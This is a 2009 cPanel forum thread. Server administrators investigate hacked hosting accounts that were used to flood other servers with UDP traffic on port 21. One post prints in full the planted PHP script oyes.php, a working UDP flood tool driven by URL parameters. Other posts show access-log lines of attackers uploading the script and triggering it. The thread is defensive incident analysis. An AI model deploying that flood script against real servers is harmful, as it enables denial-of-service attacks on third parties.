The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Spewing UDP traffic

Discussion in 'General Discussion' started by fragbait, Sep 15, 2009.

  1. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    any one come across this problem?

    I have a WHM server that in the last three days has been spewing UDP packets to port 21 on receiving locations. Not all the time, but a real pain the the rear.
    I have had to put in an iptables rule to stop the server sending traffic on port 21, protocol UDP.

    Using wireshark I saw no act that started the traffic, just that thousands of UDP packets left my server for port 21 on the receiving server, and the receiving server of course never responded to any of the packets.

    It would appear that I am being used for a DOS attack against these server, anyone come across anything similar?

    I have stopped the process,but now want to find the smoking gun.
    Thanks in advance
     
  2. MattCurry

    MattCurry Well-Known Member

    Joined:
    Aug 18, 2009
    Messages:
    275
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Houston, Tx
    Hello,


    I am sorry to hear you are having issues, however with this being possibly malicious I would recommend that you contact your data center to see if they can help you track down the source of this issue. Please let me know if you have any other questions.

    Thank you,
    Matthew Curry
     
  3. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    Spewing UDP Packets

    We are a small organisation and I am the "data center". I am back tracking and have run root kit detectors to try and find how they got in and where but have found nothing so far.

    SO I am working from the simple reality that my server was spewing out thousands of identical UDP packets at other servers in the world. Being UDP my server is not expecting any reply from the IP getting spewed at. Nor is one seen. Therefore I am trying to see what is triggering and controlling the flood.

    Nothing so far found. And the my server was recently patched before this happened.
     
  4. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    More info on spewing UDP

    This Server of mine that got hacked, how I am not too sure. Possible an injection with cPanel?

    At the same time as this happened:
    Code:
    Sep 12 20:15:49 web Cp-Wrap[2531]: Pushing "649 GETDOMAINIP xxxxxxx.xx.xx " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2531]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2534]: Pushing "649 LISTSUBDOMAINS 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2534]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2536]: Pushing "649 LISTMULTIPARKED 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2536]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2538]: Pushing "649 COUNTDBS" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2538]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2542]: Pushing "649 GETDISK" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2542]: CP-Wrapper terminated without error
    Sep 12 20:15:50 web Cp-Wrap[2549]: Pushing "649 LISTSTORE 0 0 " to '/usr/local/cpanel/bin/ftpadmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2549]: CP-Wrapper terminated without error
    
    this file appeared on the customers xxxxxxx.xx.xx website
    -rw-r--r-- 1 eastern eastern 418 Sep 12 20:16 oyes.php

    containing
    Code:
    <?php
    
    if(!$_GET['target'])
    {
    die('');
    }
    
    $target = $_GET['target'];
    
    if(!$_GET['port'])
    {
    die('');
    }
    
    $port = $_GET['port'];
    
    $sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
    
    if(!$sock) die("Cant Create Socket!!!");
    
    $data='';
    for($i=0;$i<1400;$i++)
    {
    $data.=chr(rand(0,255));
    }
    
    while(true)
    {
    if(!socket_sendto($sock,$data,strlen($data),0,$target,$port)) die("Error SendTo!!!");
    }
    
    ?>
    
    This was injected from 66.90.103.27, I have already contacted them to see what they may have to say.

    After the injection of this php file a different IP address then started sending requests to this PHP file such as this:
    Code:
    208.38.181.149 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=70.84.89.186&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9.1"
    
    I am basically writing this to make people aware. I have cleaned up the problem and stopped the possibility of UDP packets being spewed from this server, but my bigger concern is I do not know definitively how they got in.

    I don't think it was a password hack, but neither does a crafted cpanel attack seem likely as it was so surgical.
    Anyone got any ideas?
     
  5. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    Same problem, same script (oyes.php), same IP:

    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    66.90.103.27 proxy X [09/12/2009:06:21:04 -0000] "POST /frontend/x2/files/doupload.html HTTP/1.1" 200 0 "http://cpanel.XXX.XX/frontend/x2/files/upload.html?dir=%2fhome%2fXXX%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    The attack was on UDP port 21. I'm not sure yet if the password was stolen or there is a problem with cPanel authentication using proxy. If I'll find, I'll let you know. [the client user/domain was replaced with X]
     
  6. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    Cpanel insertion

    Thanks DT

    I did a look
    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    
    and found this
    Code:
    66.90.103.27 - xxxxxx[09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    66.90.103.27 - xxxxxx [09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    
    So injection or password hacked?
    The .lastlogin file did have their IP address in it. Could this only happen if they did logon?
     
  7. netearth

    netearth Registered

    Joined:
    Sep 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi there,

    We just found one of these too, filename is q.php

    Conents are the same.

    We like you are trying to see how it was injected, I assume the /frontend/x2/files/doupload.html is secure - I only asked as there is very little comment from cpanel?

    Chris
     
  8. hostultra

    hostultra Well-Known Member

    Joined:
    Aug 21, 2002
    Messages:
    167
    Likes Received:
    0
    Trophy Points:
    16
    Check your apache access logs for the first hit from that IP.
    If nothing is found check that users access log for anything suspicious.

    Did your user write his cpanel password in a php config.php file for mysql?
    Alot of users do this instead of creating a separate mysql user.
    It means any php vulnerability gives away the users cpanel password.

    Allowing php sockets is a bad idea, consider removing it if you do not need it.
    Its not a default php module, and you dont need php sockets module to use fsockopen or cURL which most scripts that make remote connections use.
     
  9. jenlepp

    jenlepp Well-Known Member

    Joined:
    Jul 4, 2005
    Messages:
    116
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Liberty Hill, TX
    cPanel Access Level:
    DataCenter Provider
    Did anyone ever find how these got in? Just found one on a user site and diving now, but I was curious if anyone narrowed it down.
     
Loading...

Share This Page